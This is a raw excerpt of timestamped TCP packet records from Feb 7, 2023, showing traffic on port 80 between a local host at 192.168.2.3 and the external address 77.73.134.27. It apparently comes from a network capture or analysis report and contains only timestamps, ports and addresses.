                                                                                    Feb 7, 2023 19:44:50.881351948 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.881367922 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.881380081 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.881401062 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.881411076 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.881428003 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.881438971 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.881460905 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.881469965 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.881493092 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.881500959 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.881517887 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.881530046 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.881546974 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.881560087 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.881577969 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.881587982 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.881607056 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.881616116 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.881637096 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.881645918 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.881673098 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.881675959 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.881695032 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.881705046 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.881725073 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.881735086 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.881751060 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.881764889 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.881783009 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.881797075 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.881814957 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.881824970 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.881853104 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.881854057 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.881874084 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.881881952 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.881899118 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.881922960 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.881925106 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.881953001 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.881966114 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.881979942 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.881994963 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882009029 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882021904 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882038116 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882051945 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882069111 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882081032 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882097960 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882127047 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882152081 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882152081 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882157087 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882172108 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882188082 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882203102 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882217884 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882235050 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882246971 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882261992 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882277012 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882288933 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882307053 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882319927 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882337093 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882350922 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882365942 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882380962 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882395029 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882411003 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882424116 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882437944 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882453918 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882469893 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882483959 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882498026 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882514000 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882527113 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882541895 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882560968 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882570982 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882584095 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882601023 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882623911 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882632017 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882643938 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882663012 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882675886 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882709026 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882710934 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882742882 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882761955 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882786036 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882798910 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882814884 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882843018 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882869959 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882874012 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882898092 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882914066 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882930040 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882941961 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882968903 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.882986069 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.882997036 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883016109 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883033037 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883059025 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883064032 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883078098 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883095026 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883111000 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883125067 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883138895 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883156061 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883168936 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883187056 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883202076 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883219957 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883249044 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883253098 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883276939 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883280993 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883305073 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883316040 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883332968 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883354902 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883367062 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883385897 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883402109 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883414984 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883429050 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883445024 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883459091 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883476973 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883488894 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883507013 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883521080 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883537054 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883564949 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883570910 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883593082 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883594990 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883616924 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883632898 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883656025 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883672953 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883682013 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883702040 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883711100 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883730888 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883754969 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883760929 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883788109 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883790016 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883816004 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883821011 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883838892 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883852005 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883869886 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883881092 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883903027 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883909941 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883925915 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883940935 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883965015 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.883970976 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.883984089 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884001970 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884013891 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884032965 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884044886 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884062052 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884092093 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884102106 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884118080 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884151936 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884155035 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884187937 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884191990 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884221077 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884222984 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884253025 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884253979 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884279013 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884282112 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884295940 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884311914 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884335041 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884341002 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884356022 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884371042 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884383917 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884401083 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884418011 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884432077 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884449005 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884463072 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884490013 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884507895 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884517908 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884546041 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884552002 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884587049 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884593964 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884609938 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884624004 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884644985 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884653091 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884669065 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884682894 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884701014 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884711981 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884737968 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884741068 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884756088 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884769917 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884788990 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884800911 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884814978 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884831905 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884845018 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884861946 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884876966 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884891987 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884921074 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884927034 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884948969 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884953022 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.884984016 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.884984970 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885011911 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885020971 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885045052 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885051966 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885065079 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885082960 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885107994 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885111094 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885129929 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885140896 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885154963 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885171890 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885185003 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885204077 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885215998 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885236025 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885248899 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885271072 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885299921 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885303020 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885328054 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885328054 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885350943 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885365009 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885377884 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885401011 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885418892 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885431051 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885449886 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885459900 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885478020 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885490894 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885504007 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885520935 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885535002 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885550022 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885565996 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885591030 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885649920 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885688066 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885700941 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885723114 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885739088 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885752916 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885775089 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885787964 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885798931 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885817051 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885831118 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885847092 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885862112 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885876894 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885890961 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885906935 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885936022 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.885957003 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.885963917 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886003017 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886003971 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886039019 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886039019 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886068106 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886070013 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886096001 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886097908 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886121988 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886126041 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886141062 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886156082 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886169910 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886185884 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886200905 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886217117 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886245966 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886245966 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886260033 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886276960 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886288881 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886306047 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886317968 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886336088 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886364937 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886368990 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886392117 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886394978 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886419058 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886434078 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886444092 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886470079 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886482000 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886497021 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886523008 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886526108 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886554003 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886558056 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886575937 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886585951 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886605024 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.886614084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.886630058 CET4969880192.168.2.377.73.134.27
